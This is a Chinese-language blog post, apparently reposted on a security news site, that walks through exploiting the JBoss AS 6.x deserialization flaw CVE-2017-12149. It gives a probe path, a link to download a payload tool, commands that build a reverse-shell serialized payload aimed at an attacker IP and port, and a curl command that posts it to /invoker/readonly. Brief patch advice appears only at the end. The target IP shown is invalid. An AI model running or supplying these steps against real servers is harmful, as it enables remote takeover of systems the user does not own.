[CVE-2017-12149] JBOOS AS 6.X 反序列化漏洞利用

JAVASEC 2019年11月21日02:32:06评论1,715 views字数 711阅读2分22秒阅读模式
摘要

检测目录: 返回500 一般就是存在了。下载工具:http://scan.javasec.cn/java/JavaDeserH2HC.zip

检测目录: [CVE-2017-12149] JBOOS AS 6.X 反序列化漏洞利用

返回500 一般就是存在了。

下载工具:

http://scan.javasec.cn/java/JavaDeserH2HC.zip

使用方法:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java  java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:port //反弹shell的IP和端口 

这个时候会生成一个ReverseShellCommonsCollectionsHashMap.ser文件,curl 这个二进制文件就可以了。

ReverseShellCommonsCollectionsHashMap.ser 打包到http://scan.javasec.cn/java/ReverseShellCommonsCollectionsHashMap.ser

curl http://192.268.197.25:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser 

监听:[CVE-2017-12149] JBOOS AS 6.X 反序列化漏洞利用
发送payload:
[CVE-2017-12149] JBOOS AS 6.X 反序列化漏洞利用
服务器log:
[CVE-2017-12149] JBOOS AS 6.X 反序列化漏洞利用
反弹结果:
[CVE-2017-12149] JBOOS AS 6.X 反序列化漏洞利用
工具:
[CVE-2017-12149] JBOOS AS 6.X 反序列化漏洞利用
done.
修复建议:

  • 不需要 http-invoker.sar 组件的用户可直接删除此组件。
  • 添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中,对
    http invoker 组件进行访问控制: <url-pattern>/*</url-pattern>

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
JAVASEC
  • 本文由 发表于 2019年11月21日02:32:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [CVE-2017-12149] JBOOS AS 6.X 反序列化漏洞利用https://cn-sec.com/archives/70707.html

发表评论

匿名网友 填写信息